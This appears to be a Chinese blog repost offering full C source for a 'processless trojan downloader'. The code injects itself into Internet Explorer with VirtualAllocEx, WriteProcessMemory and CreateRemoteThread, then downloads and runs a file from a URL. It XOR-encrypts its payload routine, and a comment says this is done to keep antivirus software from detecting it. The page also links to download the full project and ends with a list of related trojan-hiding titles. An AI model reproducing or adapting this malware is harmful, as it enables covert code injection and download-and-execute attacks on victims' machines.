VC无进程木马下载器源码(利用IE隐藏进程)
来源:互联网 发布:java网上报修系统源码 编辑:程序博客网 时间:2024/05/01 18:32
一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!
下面是程序的主要思路:
1.获取程序自身路径,启动IE进程
2.获取到IE进程句柄
3.分配内存
4.获取进程映像的地址
5.得到内存镜像大小
6.确定起始基址和内存映像基址的位置
7.写内存,创建线程,写数据
8.建立远程线程并运行,关闭对象
二、下面是源码 ,举例下载迅雷而矣:
- /*
- VC无进程木马下载器
- By: Kardinal and 寂寞的狼
- 2009.3.10
- */
- #include <windows.h>
- #pragma comment(lib,"user32.lib")
- #pragma comment(lib,"kernel32.lib")
- //取消这4行的注释,可编译出2K大的文件
- //#pragma comment(linker,"/OPT:NOWIN98")
- //#pragma comment(linker,"/merge:.data=.text")
- //#pragma comment(linker,"/merge:.rdata=.text")
- //#pragma comment(linker,"/align:0x200")
- #pragma comment(linker,"/ENTRY:decrpt")
- #pragma comment(linker,"/subsystem:windows")
- #pragma comment(linker,"/BASE:0x13150000")
- //动态加载shell32.dll中的ShellExecuteA函数
- HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int);
- //动态加载Urlmon.dll中的UrlDownloadToFileA函数
- DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR);
- //建立远程线程,并运行
- HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
- void decrpt();
- HANDLE processhandle;
- DWORD pid;
- HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE与HMOUDLE是通用
- // 注入使用的下载函数
- void download()
- {
- hshell = LoadLibrary("Shell32.dll");
- hurlmon = LoadLibrary("urlmon.dll");
- (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA");
- (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA");
- //下载的文件自行调整
- DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL);
- SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5);
- ExitProcess(0);
- }
- void main()
- {
- char iename[MAX_PATH],iepath[MAX_PATH];
- ZeroMemory(iename,sizeof(iename));
- ZeroMemory(iepath,sizeof(iepath));
- // 1.获取程序自身路径,启动IE进程
- GetWindowsDirectory(iepath,MAX_PATH);
- strncpy(iename,iepath,3);
- strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE");
- WinExec(iename,SW_SHOWNORMAL);
- Sleep(500);
- // 2.得到IE进程句柄
- HWND htemp;
- htemp = FindWindow("IEFrame",NULL);
- GetWindowThreadProcessId(htemp,&pid);
- // 3.分配内存
- HMODULE Module;
- LPVOID NewModule;
- DWORD Size;
- LPDWORD lpimagesize;
- // 4.进程映像的地址
- Module = GetModuleHandle(NULL);
- // 5.得到内存镜像大小
- _asm
- {
- push eax;
- push ebx;
- mov ebx,Module;
- mov eax,[ebx+0x3c];
- lea eax,[ebx+eax+0x50];
- mov eax,[eax]
- mov lpimagesize,eax;
- pop ebx;
- pop eax;
- };
- Size=(DWORD)lpimagesize;
- // 确定起始基址和内存映像基址的位置
- NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- // 6.写内存,创建线程,写数据
- WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
- LPTHREAD_START_ROUTINE entrypoint;
- __asm
- {
- push eax;
- lea eax,download;
- mov entrypoint,eax;
- pop eax
- }
- hkernel=LoadLibrary("KERNEL32.dll");
- (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
- MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
- // 7.关闭对象
- CloseHandle(processhandle);
- return;
- } ;
- // 解密函数
- void decrpt()
- {
- HANDLE myps;
- DWORD oldAttr;
- BYTE shellcode[500];
- ZeroMemory(shellcode,sizeof(shellcode));
- myps=GetCurrentProcess();
- ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
- //先把原代码,搬移到变量中保存起来
- _asm
- {
- pushad;
- lea esi,download;
- lea edi,shellcode;
- lea ecx,decrpt;
- sub ecx,esi;
- en1:
- lodsb;
- stosb;
- dec ecx;
- jne en1;
- popad;
- };
- //解密搬回
- int i;
- for (i=1;i<=0xFF;i++)
- {
- _asm
- {
- pushad;
- lea esi,shellcode;
- lea edi,download;
- lea ecx,decrpt;
- sub ecx,edi;
- en2:
- lodsb;
- mov ebx,i;
- xor al,bl;
- stosb;
- dec ecx;
- jne en2;
- popad;
- };
- //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
- __try
- {
- main();
- return;
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- };
- }
- return;
- }
三、工程及源码下载地址:
http://download.csdn.net/source/1546155
http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/
0 0
- VC无进程木马下载器源码(利用IE隐藏进程)
- VC无进程木马下载器源码(利用IE隐藏进程)
- VC无进程木马下载器源码
- 【转自koma】 VC无进程木马下载器源码
- 无进程DLL木马
- 无dll无进程木马
- 无dll无进程木马源代码
- 无Dll无进程木马源代码
- 无dll无进程木马源代码
- 无dll无进程木马源代码
- vc 隐藏进程
- 木马外挂技术,隐藏进程,为所欲为
- 关于隐藏进程ROOKIT木马的介绍
- 无Dll插入进程,下载者VC源代码
- 无Dll插入进程、下载者VC源代码
- 无dll插入进程,下载者vc源代码
- WINNT下隐藏木马的进程 DLL木马篇
- WINNT下隐藏木马的进程 DLL木马篇
- 批处理创建文件的方法
- 杭电2059
- 保存设置到XML文件DEMO
- zoj 3781 Paint the Grid Reloaded
- iosUI开发的一些随笔记
- VC无进程木马下载器源码(利用IE隐藏进程)
- s3c2440 IIC协议
- ID Codes
- HDU 1074Doing Homework(状态压缩dp)
- VC判断当前用户有无Administrator的权限
- FATAL: Could not read from boot medium. System halted.
- 人人都能成为黑客:不是游戏打不过小学生了,而是编码也不如小学生咯 !
- 贪心磁盘存储问题
- ORA-01506: missing or illegal database name